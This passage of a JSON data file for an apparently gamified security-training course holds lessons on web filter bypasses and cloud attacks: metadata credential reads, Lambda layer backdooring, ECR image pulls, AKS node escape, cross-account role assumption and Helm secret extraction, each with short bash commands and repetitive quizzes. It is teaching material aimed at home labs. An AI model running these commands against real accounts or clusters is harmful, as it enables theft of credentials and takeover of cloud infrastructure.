only inspect GET/POST bodies."},{"type":"code","lang":"bash","content":"# Security filter blocks GET/POST:\ncurl -X GET https://target.com/admin   # 403\ncurl -X POST https://target.com/admin  # 403\n# Try:\ncurl -X HEAD https://target.com/admin   # 200?\ncurl -X OPTIONS https://target.com/admin # 200?\ncurl -X TRACE https://target.com/admin   # 200?"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HEAD requests sometimes bypass filters because...","opts":["They're encrypted","Filters often only inspect GET/POST request bodies","They're faster","They use different ports"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1}]},{"id":"wa-json-interop","cat":"Web Application","title":"JSON Interoperability Issues","diff":4,"xp":250,"intro":"Exploit differences in JSON parsing between frontend and backend.","sections":[{"type":"text","content":"Duplicate keys, comment injection, trailing commas, large numbers \u2014 different JSON parsers handle edge cases differently, leading to security bypasses."},{"type":"code","lang":"bash","content":"# Duplicate keys: which value wins?\n{\"role\":\"user\",\"role\":\"admin\"}\n# First parser takes first value, second takes last\n# If WAF checks first and app uses last = bypass\n\n# Large number overflow:\n{\"id\":9999999999999999999}  # may overflow to 0 in some parsers"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Duplicate JSON keys can bypass WAFs because...","opts":["JSON forbids duplicates","Different parsers may pick different values (first vs last)","JSON is encrypted","WAFs can't read JSON"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1}]},{"id":"cl-ec2-userdata","cat":"Cloud & Container","title":"EC2 User Data Secrets","diff":1,"xp":75,"intro":"Instance user data scripts often contain hardcoded credentials.","sections":[{"type":"text","content":"EC2 user data (bootstrap scripts) are accessible from the instance metadata. They frequently contain database passwords, API keys, and setup credentials."},{"type":"code","lang":"bash","content":"# Read user data from inside the instance\ncurl http://169.254.169.254/latest/user-data\n# Often contains:\n# DB_PASSWORD=production_secret\n# AWS_ACCESS_KEY_ID=AKIA...\n# API_KEY=sk-..."},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"EC2 user data is dangerous because it...","opts":["Is encrypted","Often contains hardcoded credentials and is readable from metadata","Is deleted after boot","Requires admin access"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1},{"type":"quiz","q":"GuardDuty provides...","opts":["Firewall","Threat detection","Orchestration","DNS"],"ans":1},{"type":"quiz","q":"RBAC controls...","opts":["Network","Who can do what in cluster","Images","Storage"],"ans":1},{"type":"quiz","q":"0.0.0.0/0 in SG means...","opts":["Blocked","Open to entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Metadata IP is...","opts":["10.0.0.1","127.0.0.1","169.254.169.254","192.168.1.1"],"ans":2},{"type":"quiz","q":"K8s secrets are...","opts":["Encrypted default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Shared responsibility means...","opts":["Provider does all","Security shared between provider and customer","Customer does all","No one"],"ans":1},{"type":"quiz","q":"Container shares host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Shift-left means...","opts":["Move servers","Apply security earlier in development","Rotate keys","Change topology"],"ans":1},{"type":"quiz","q":"Sidecar container is...","opts":["Backup","Helper alongside main app","Monitor","Load balancer"],"ans":1},{"type":"quiz","q":"kubectl uses...","opts":["SSH","HTTPS to K8s API","FTP","SMTP"],"ans":1},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deploy","Before deployment (shift-left)","At runtime","In backups"],"ans":1},{"type":"quiz","q":"Container registry stores...","opts":["Logs","Container images","Firewall rules","DNS records"],"ans":1},{"type":"quiz","q":"VPC is a...","opts":["Virtual Private Cloud","Virtual Protocol","Variable Process","Verified Certificate"],"ans":0},{"type":"quiz","q":"Cloud forensics uses...","opts":["Disk imaging","API logs, snapshots, and flow logs","Memory only","Network only"],"ans":1}]},{"id":"cl-lambda-layers","cat":"Cloud & Container","title":"Lambda Layer Poisoning","diff":4,"xp":250,"intro":"Modify a shared Lambda layer to backdoor all functions that use it.","sections":[{"type":"text","content":"Lambda layers are shared code packages. If you can modify a layer, every function using it executes your code \u2014 supply chain attack at the serverless level."},{"type":"code","lang":"bash","content":"# List layers\naws lambda list-layers\n# Check which functions use a layer\naws lambda list-functions --query 'Functions[?Layers]'\n# If you can publish a new layer version:\naws lambda publish-layer-version --layer-name shared-utils --zip-file fileb://evil-layer.zip"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Lambda layer poisoning is a supply chain attack because...","opts":["It's fast","Modifying one shared layer affects all functions using it","It uses encryption","It requires root"],"ans":1},{"type":"quiz","q":"Serverless leaks secrets via...","opts":["Log files","Environment variables","S3","DynamoDB"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1},{"type":"quiz","q":"GuardDuty provides...","opts":["Firewall","Threat detection","Orchestration","DNS"],"ans":1},{"type":"quiz","q":"RBAC controls...","opts":["Network","Who can do what in cluster","Images","Storage"],"ans":1},{"type":"quiz","q":"0.0.0.0/0 in SG means...","opts":["Blocked","Open to entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Metadata IP is...","opts":["10.0.0.1","127.0.0.1","169.254.169.254","192.168.1.1"],"ans":2},{"type":"quiz","q":"K8s secrets are...","opts":["Encrypted default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Shared responsibility means...","opts":["Provider does all","Security shared between provider and customer","Customer does all","No one"],"ans":1},{"type":"quiz","q":"Container shares host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Shift-left means...","opts":["Move servers","Apply security earlier in development","Rotate keys","Change topology"],"ans":1},{"type":"quiz","q":"Sidecar container is...","opts":["Backup","Helper alongside main app","Monitor","Load balancer"],"ans":1},{"type":"quiz","q":"kubectl uses...","opts":["SSH","HTTPS to K8s API","FTP","SMTP"],"ans":1},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deploy","Before deployment (shift-left)","At runtime","In backups"],"ans":1},{"type":"quiz","q":"Container registry stores...","opts":["Logs","Container images","Firewall rules","DNS records"],"ans":1},{"type":"quiz","q":"VPC is a...","opts":["Virtual Private Cloud","Virtual Protocol","Variable Process","Verified Certificate"],"ans":0}]},{"id":"cl-ecr-theft","cat":"Cloud & Container","title":"ECR Image Theft","diff":2,"xp":150,"intro":"Pull container images from misconfigured ECR repositories.","sections":[{"type":"text","content":"If ECR repository policies allow public or cross-account access, pull images to extract source code, secrets, and internal architecture."},{"type":"code","lang":"bash","content":"# Check if ECR is publicly accessible\naws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin ACCOUNT.dkr.ecr.us-east-1.amazonaws.com\n# Pull images\ndocker pull ACCOUNT.dkr.ecr.us-east-1.amazonaws.com/app:latest\n# Inspect for secrets\ndocker history --no-trunc ACCOUNT.dkr.ecr.us-east-1.amazonaws.com/app:latest"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"ECR images can contain...","opts":["Only binaries","Source code, config files, and hardcoded secrets","Only OS packages","Nothing useful"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1},{"type":"quiz","q":"GuardDuty provides...","opts":["Firewall","Threat detection","Orchestration","DNS"],"ans":1},{"type":"quiz","q":"RBAC controls...","opts":["Network","Who can do what in cluster","Images","Storage"],"ans":1},{"type":"quiz","q":"0.0.0.0/0 in SG means...","opts":["Blocked","Open to entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Metadata IP is...","opts":["10.0.0.1","127.0.0.1","169.254.169.254","192.168.1.1"],"ans":2},{"type":"quiz","q":"K8s secrets are...","opts":["Encrypted default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Shared responsibility means...","opts":["Provider does all","Security shared between provider and customer","Customer does all","No one"],"ans":1},{"type":"quiz","q":"Container shares host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Shift-left means...","opts":["Move servers","Apply security earlier in development","Rotate keys","Change topology"],"ans":1},{"type":"quiz","q":"Sidecar container is...","opts":["Backup","Helper alongside main app","Monitor","Load balancer"],"ans":1},{"type":"quiz","q":"kubectl uses...","opts":["SSH","HTTPS to K8s API","FTP","SMTP"],"ans":1},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deploy","Before deployment (shift-left)","At runtime","In backups"],"ans":1},{"type":"quiz","q":"Container registry stores...","opts":["Logs","Container images","Firewall rules","DNS records"],"ans":1},{"type":"quiz","q":"VPC is a...","opts":["Virtual Private Cloud","Virtual Protocol","Variable Process","Verified Certificate"],"ans":0},{"type":"quiz","q":"Cloud forensics uses...","opts":["Disk imaging","API logs, snapshots, and flow logs","Memory only","Network only"],"ans":1}]},{"id":"cl-aks-attack","cat":"Cloud & Container","title":"Azure AKS Penetration Testing","diff":4,"xp":250,"intro":"Attack Azure-managed Kubernetes clusters.","sections":[{"type":"text","content":"AKS attack: enumerate via Azure CLI, get kubectl access, check RBAC, find secrets, escape to node, steal managed identity token."},{"type":"code","lang":"bash","content":"# Enumerate AKS\naz aks list\naz aks get-credentials --resource-group RG --name cluster\n# Check permissions\nkubectl auth can-i --list\n# Get secrets\nkubectl get secrets -A\n# Escape to node\nkubectl run pwned --image=alpine --restart=Never --overrides='{...privileged...}'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AKS node escape gives access to...","opts":["Other clusters","The node's Azure Managed Identity","The internet only","Nothing"],"ans":1},{"type":"quiz","q":"Serverless leaks secrets via...","opts":["Log files","Environment variables","S3","DynamoDB"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1},{"type":"quiz","q":"GuardDuty provides...","opts":["Firewall","Threat detection","Orchestration","DNS"],"ans":1},{"type":"quiz","q":"RBAC controls...","opts":["Network","Who can do what in cluster","Images","Storage"],"ans":1},{"type":"quiz","q":"0.0.0.0/0 in SG means...","opts":["Blocked","Open to entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Metadata IP is...","opts":["10.0.0.1","127.0.0.1","169.254.169.254","192.168.1.1"],"ans":2},{"type":"quiz","q":"K8s secrets are...","opts":["Encrypted default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Shared responsibility means...","opts":["Provider does all","Security shared between provider and customer","Customer does all","No one"],"ans":1},{"type":"quiz","q":"Container shares host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Shift-left means...","opts":["Move servers","Apply security earlier in development","Rotate keys","Change topology"],"ans":1},{"type":"quiz","q":"Sidecar container is...","opts":["Backup","Helper alongside main app","Monitor","Load balancer"],"ans":1},{"type":"quiz","q":"kubectl uses...","opts":["SSH","HTTPS to K8s API","FTP","SMTP"],"ans":1},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deploy","Before deployment (shift-left)","At runtime","In backups"],"ans":1},{"type":"quiz","q":"Container registry stores...","opts":["Logs","Container images","Firewall rules","DNS records"],"ans":1},{"type":"quiz","q":"VPC is a...","opts":["Virtual Private Cloud","Virtual Protocol","Variable Process","Verified Certificate"],"ans":0}]},{"id":"cl-crossaccount","cat":"Cloud & Container","title":"AWS Cross-Account Role Assumption","diff":3,"xp":200,"intro":"Pivot between AWS accounts using misconfigured trust policies.","sections":[{"type":"text","content":"IAM roles with overly permissive trust policies (Principal: *) can be assumed by anyone. Cross-account roles are the bridge between AWS accounts."},{"type":"code","lang":"bash","content":"# Check for assumable roles\naws iam list-roles --query 'Roles[?AssumeRolePolicyDocument]'\n# Assume a cross-account role\naws sts assume-role --role-arn arn:aws:iam::TARGET_ACCOUNT:role/admin --role-session-name pwned\n# Use the temporary credentials\nexport AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... AWS_SESSION_TOKEN=..."},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Cross-account role assumption requires...","opts":["Physical access","A trust policy that allows your principal to assume the role","Network access only","DNS control"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1},{"type":"quiz","q":"GuardDuty provides...","opts":["Firewall","Threat detection","Orchestration","DNS"],"ans":1},{"type":"quiz","q":"RBAC controls...","opts":["Network","Who can do what in cluster","Images","Storage"],"ans":1},{"type":"quiz","q":"0.0.0.0/0 in SG means...","opts":["Blocked","Open to entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Metadata IP is...","opts":["10.0.0.1","127.0.0.1","169.254.169.254","192.168.1.1"],"ans":2},{"type":"quiz","q":"K8s secrets are...","opts":["Encrypted default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Shared responsibility means...","opts":["Provider does all","Security shared between provider and customer","Customer does all","No one"],"ans":1},{"type":"quiz","q":"Container shares host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Shift-left means...","opts":["Move servers","Apply security earlier in development","Rotate keys","Change topology"],"ans":1},{"type":"quiz","q":"Sidecar container is...","opts":["Backup","Helper alongside main app","Monitor","Load balancer"],"ans":1},{"type":"quiz","q":"kubectl uses...","opts":["SSH","HTTPS to K8s API","FTP","SMTP"],"ans":1},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deploy","Before deployment (shift-left)","At runtime","In backups"],"ans":1},{"type":"quiz","q":"Container registry stores...","opts":["Logs","Container images","Firewall rules","DNS records"],"ans":1},{"type":"quiz","q":"VPC is a...","opts":["Virtual Private Cloud","Virtual Protocol","Variable Process","Verified Certificate"],"ans":0},{"type":"quiz","q":"Cloud forensics uses...","opts":["Disk imaging","API logs, snapshots, and flow logs","Memory only","Network only"],"ans":1}]},{"id":"cl-helm-secrets","cat":"Cloud & Container","title":"Helm Release Secrets Extraction","diff":2,"xp":150,"intro":"Helm stores release data including values (often with secrets) in K8s secrets.","sections":[{"type":"text","content":"Helm stores release metadata and values in Kubernetes secrets. These often contain database passwords, API keys, and other sensitive configuration."},{"type":"code","lang":"bash","content":"# List Helm releases\nhelm list -A\n# Get release values (may contain secrets)\nhelm get values my-release -A\n# Or from K8s secrets\nkubectl get secrets -l owner=helm -A\nkubectl get secret sh.helm.release.v1.my-release.v1 -o json | jq '.data.release' | base64 -d | base64 -d | gunzip"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Helm release secrets contain...","opts":["Only metadata","Values including database passwords and API keys","Only chart templates","Only version history"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1},{"type":"quiz","q":"GuardDuty provides...","opts":["Firewall","Threat detection","Orchestration","DNS"],"ans":1},{"type":"quiz","q":"RBAC controls...","opts":["Network","Who can do what in cluster","Images","Storage"],"ans":1},{"type":"quiz","q":"0.0.0.0/0 in SG means...","opts":["Blocked","Open to entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Metadata IP is...","opts":["10.0.0.1","127.0.0.1","169.254.169.254","192.168.1.1"],"ans":2},{"type":"quiz","q":"K8s secrets are...","opts":["Encrypted default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Shared responsibility means...","opts":["Provider does all","Security shared between provider and customer","Customer does all","No one"],"ans":1},{"type":"quiz","q":"Container shares host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Shift-left means...","opts":["Move servers","Apply security earlier in development","Rotate keys","Change topology"],"ans":1},{"type":"quiz","q":"Sidecar container is...","opts":["Backup","Helper alongside main app","Monitor","Load balancer"],"ans":1},{"type":"quiz","q":"kubectl uses...","opts":["SSH","HTTPS to K8s API","FTP","SMTP"],"ans":1},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deploy","Before deployment (shift-left)","At runtime","In backups"],"ans":1},{"type":"quiz","q":"Container registry stores...","opts":["Logs","Container images","Firewall rules","DNS records"],"ans":1},{"type":"quiz","q":"VPC is a...","opts":["Virtual Private Cloud","Virtual 